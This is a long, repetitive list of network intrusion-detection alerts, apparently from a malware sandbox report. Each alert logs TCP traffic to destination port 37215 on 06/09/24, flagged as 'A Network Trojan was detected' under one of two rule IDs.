          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552809
          SID:2829579
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160998
          SID:2835222
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272650
          SID:2829579
          Source Port:53584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226846
          SID:2829579
          Source Port:60130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026942
          SID:2835222
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540057
          SID:2835222
          Source Port:49174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908804
          SID:2829579
          Source Port:47656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137965
          SID:2829579
          Source Port:60484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037449
          SID:2829579
          Source Port:40488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413168
          SID:2829579
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417566
          SID:2829579
          Source Port:35234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080726
          SID:2829579
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478221
          SID:2835222
          Source Port:39860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892856
          SID:2829579
          Source Port:46082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822159
          SID:2835222
          Source Port:54602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166031
          SID:2835222
          Source Port:43470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242608
          SID:2835222
          Source Port:57866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104532
          SID:2829579
          Source Port:57882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280495
          SID:2829579
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892764
          SID:2829579
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594009
          SID:2829579
          Source Port:48870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205835
          SID:2835222
          Source Port:35212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989569
          SID:2829579
          Source Port:39704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018032
          SID:2835222
          Source Port:60560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819703
          SID:2835222
          Source Port:50624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684687
          SID:2829579
          Source Port:34734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993716
          SID:2829579
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.076286
          SID:2829579
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302498
          SID:2835222
          Source Port:43042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928217
          SID:2829579
          Source Port:37344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948435
          SID:2829579
          Source Port:40118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292770
          SID:2835222
          Source Port:50504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821094
          SID:2835222
          Source Port:55500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398976
          SID:2835222
          Source Port:56524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396506
          SID:2829579
          Source Port:49908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289396
          SID:2829579
          Source Port:41298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396820
          SID:2829579
          Source Port:39954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274629
          SID:2829579
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915603
          SID:2829579
          Source Port:49690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540430
          SID:2835222
          Source Port:42288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397536
          SID:2835222
          Source Port:49360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079514
          SID:2835222
          Source Port:32806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475902
          SID:2835222
          Source Port:57402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603692
          SID:2835222
          Source Port:51320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990428
          SID:2829579
          Source Port:59054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205651
          SID:2829579
          Source Port:46970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292838
          SID:2829579
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206015
          SID:2829579
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157983
          SID:2829579
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280589
          SID:2835222
          Source Port:47740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414230
          SID:2829579
          Source Port:41096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561878
          SID:2835222
          Source Port:49178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285536
          SID:2829579
          Source Port:47614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598477
          SID:2835222
          Source Port:38354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539586
          SID:2829579
          Source Port:57088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284227
          SID:2835222
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869855
          SID:2829579
          Source Port:60590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078817
          SID:2835222
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922029
          SID:2835222
          Source Port:60454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078496
          SID:2829579
          Source Port:40226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716553
          SID:2835222
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274236
          SID:2829579
          Source Port:49948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243931
          SID:2829579
          Source Port:38968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920466
          SID:2835222
          Source Port:47784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861004
          SID:2829579
          Source Port:33078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931544
          SID:2829579
          Source Port:54176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920427
          SID:2835222
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688095
          SID:2829579
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.148132
          SID:2835222
          Source Port:44294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166227
          SID:2835222
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166114
          SID:2835222
          Source Port:56984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946789
          SID:2835222
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944914
          SID:2835222
          Source Port:35454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986579
          SID:2835222
          Source Port:38782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166047
          SID:2829579
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948268
          SID:2835222
          Source Port:38448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.896027
          SID:2835222
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929274
          SID:2835222
          Source Port:41810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034303
          SID:2829579
          Source Port:33646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032722
          SID:2835222
          Source Port:57236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948916
          SID:2835222
          Source Port:43904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473621
          SID:2829579
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079555
          SID:2835222
          Source Port:57582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908748
          SID:2829579
          Source Port:51444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909325
          SID:2829579
          Source Port:36110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038407
          SID:2835222
          Source Port:42548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077616
          SID:2835222
          Source Port:33560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206857
          SID:2835222
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677400
          SID:2829579
          Source Port:45086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288354
          SID:2835222
          Source Port:58628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289558
          SID:2829579
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720715
          SID:2835222
          Source Port:34038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946157
          SID:2835222
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568295
          SID:2829579
          Source Port:36052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077244
          SID:2829579
          Source Port:34698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538745
          SID:2829579
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676209
          SID:2835222
          Source Port:54938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290365
          SID:2829579
          Source Port:51792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718757
          SID:2829579
          Source Port:45816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719091
          SID:2829579
          Source Port:45094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646276
          SID:2829579
          Source Port:42730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865752
          SID:2835222
          Source Port:41996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167971
          SID:2835222
          Source Port:55038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282148
          SID:2835222
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909359
          SID:2829579
          Source Port:56458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561731
          SID:2835222
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034859
          SID:2835222
          Source Port:39130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538089
          SID:2829579
          Source Port:34258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288980
          SID:2829579
          Source Port:45856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027919
          SID:2829579
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951559
          SID:2835222
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036101
          SID:2835222
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246024
          SID:2829579
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039039
          SID:2829579
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287035
          SID:2829579
          Source Port:50632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222896
          SID:2829579
          Source Port:35748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928094
          SID:2829579
          Source Port:34752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942148
          SID:2835222
          Source Port:35926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822101
          SID:2835222
          Source Port:59874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226848
          SID:2835222
          Source Port:60920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.479009
          SID:2829579
          Source Port:51970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034646
          SID:2829579
          Source Port:37926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540340
          SID:2829579
          Source Port:34974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948046
          SID:2835222
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948975
          SID:2829579
          Source Port:48642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645137
          SID:2829579
          Source Port:40096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418573
          SID:2835222
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078708
          SID:2829579
          Source Port:42916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283983
          SID:2829579
          Source Port:55832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413060
          SID:2835222
          Source Port:36802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890918
          SID:2829579
          Source Port:42562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864548
          SID:2829579
          Source Port:44930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820269
          SID:2835222
          Source Port:41952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989553
          SID:2835222
          Source Port:48922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081044
          SID:2835222
          Source Port:41330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944565
          SID:2829579
          Source Port:45830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677444
          SID:2829579
          Source Port:60804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946698
          SID:2829579
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537802
          SID:2835222
          Source Port:38126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077133
          SID:2835222
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571561
          SID:2829579
          Source Port:40120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414244
          SID:2829579
          Source Port:41994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998614
          SID:2829579
          Source Port:55378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165049
          SID:2829579
          Source Port:42630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476937
          SID:2835222
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079435
          SID:2835222
          Source Port:40470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925177
          SID:2829579
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990276
          SID:2829579
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400154
          SID:2829579
          Source Port:48840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945984
          SID:2829579
          Source Port:52050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569292
          SID:2835222
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165478
          SID:2835222
          Source Port:35538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867205
          SID:2835222
          Source Port:34994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869328
          SID:2829579
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225223
          SID:2835222
          Source Port:45650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284998
          SID:2829579
          Source Port:51486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678006
          SID:2835222
          Source Port:56130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942170
          SID:2835222
          Source Port:38680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692043
          SID:2835222
          Source Port:55410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119692
          SID:2829579
          Source Port:45486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990298
          SID:2829579
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285077
          SID:2835222
          Source Port:59776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206493
          SID:2829579
          Source Port:40424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206972
          SID:2835222
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119805
          SID:2829579
          Source Port:59228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128948
          SID:2829579
          Source Port:36428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914827
          SID:2829579
          Source Port:37908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600881
          SID:2829579
          Source Port:46086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242330
          SID:2835222
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646029
          SID:2835222
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539420
          SID:2835222
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643856
          SID:2835222
          Source Port:49380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301317
          SID:2835222
          Source Port:42592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226562
          SID:2835222
          Source Port:52612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653461
          SID:2835222
          Source Port:43486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269861
          SID:2835222
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017339
          SID:2829579
          Source Port:47914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082061
          SID:2835222
          Source Port:58728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230385
          SID:2829579
          Source Port:46986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.645067
          SID:2835222
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819737
          SID:2835222
          Source Port:43320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719061
          SID:2835222
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562002
          SID:2829579
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946442
          SID:2829579
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684699
          SID:2835222
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818263
          SID:2835222
          Source Port:51916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991369
          SID:2829579
          Source Port:42452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400141
          SID:2835222
          Source Port:53608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993493
          SID:2829579
          Source Port:32794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718052
          SID:2835222
          Source Port:60976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644980
          SID:2829579
          Source Port:34658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039674
          SID:2829579
          Source Port:50782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000434
          SID:2829579
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288624
          SID:2829579
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018046
          SID:2835222
          Source Port:43098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396105
          SID:2829579
          Source Port:53288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724182
          SID:2835222
          Source Port:60162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
